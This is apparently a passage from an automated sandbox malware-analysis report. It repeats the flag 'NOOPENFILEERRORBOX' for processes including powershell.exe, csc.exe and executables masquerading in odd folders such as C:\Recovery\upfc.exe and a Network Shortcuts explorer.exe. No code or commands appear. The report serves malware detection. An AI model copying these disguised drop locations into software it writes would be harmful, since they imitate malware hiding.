                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Browserhost\LaSqLWtOcizKrlm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
